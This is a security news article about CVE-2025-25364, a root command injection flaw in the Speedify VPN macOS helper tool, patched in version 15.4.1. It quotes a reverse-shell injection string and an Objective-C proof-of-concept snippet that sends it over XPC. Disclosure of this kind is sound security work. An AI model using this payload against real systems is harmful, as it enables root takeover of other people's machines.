A major security flaw in the Speedify VPN application for macOS, tracked as CVE-2025-25364, has exposed millions of users to the risk of complete system compromise.
Researchers at SecureLayer7 discovered the vulnerability in Speedify’s privileged helper tool. It could potentially allow local attackers to execute arbitrary commands as root and take total control of affected systems.
CVE-2025-25364: A Critical Command Injection Vulnerability
The root of the problem lies within the me.connectify.SMJobBlessHelper XPC service—a helper tool that runs with elevated (root) privileges to perform system-level network operations for Speedify.
.png
)
This service, installed as a privileged daemon via /Library/PrivilegedHelperTools/me.connectify.SMJobBlessHelper, is configured to receive and process commands from the main Speedify app via Apple’s XPC messaging system.
| Aspect | Details |
| CVE ID | CVE-2025-25364 |
| Affected Product | Speedify VPN |
| Affected Version | 15.0.0 (macOS) |
| Patched Version | 15.4.1 |
| Component | me.connectify.SMJobBlessHelper (Privileged Helper Tool at /Library/PrivilegedHelperTools/) |
| Vulnerability Type | Command Injection |
Due to improper input validation, particularly of the cmdPath and cmdBin fields in incoming XPC messages, a local attacker can craft a malicious payload.
These fields are directly embedded into the command execution logic without sanitization, enabling an attacker to inject arbitrary shell commands, which the helper tool then executes with root privileges.
Three key functions are at the heart of this vulnerability:
- XPC Message Handler: Accepts and parses incoming XPC messages, directing those with a “runSpeedify” request to a launch handler with no input validation.
- _handleLaunchSpeedifyMsg: Extracts cmdPath and cmdBin directly from the input and initiates program execution.
- _RunSystemCmd: Constructs a shell command from these fields and calls system() to execute it. This line illustrates the injection risk:
rax = asprintf(&var_38, “codesign -v -R=\”certificate leaf[subject.CN] = \”%s\” and anchor apple generic\” \”%s\””, “…”, rcx);
A threat actor can set cmdBin or cmdPath to a string such as “; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo ” to open a root shell connection to an external server.
Researchers released a proof-of-concept (PoC) exploit written in Objective-C, using the XPC APIs to connect to the vulnerable helper and send a crafted payload.
The payload triggers arbitrary code execution as root, such as spawning a reverse shell. Here’s a relevant snippet:
xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);The impact of this flaw is critical: an attacker with local access could gain full root control, modify sensitive files, install persistent malware, and exfiltrate data.
Since most Speedify VPN users rely on the app for privacy, this vulnerability could have undermined the security of a broad user base.
Speedify users are strongly advised to upgrade to version 15.4.1 or above, which addresses the flaw with a complete helper tool rewrite, stricter input validation, and the removal of insecure XPC handling.
The incident highlights the paramount importance of rigorous input validation in all privileged code.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
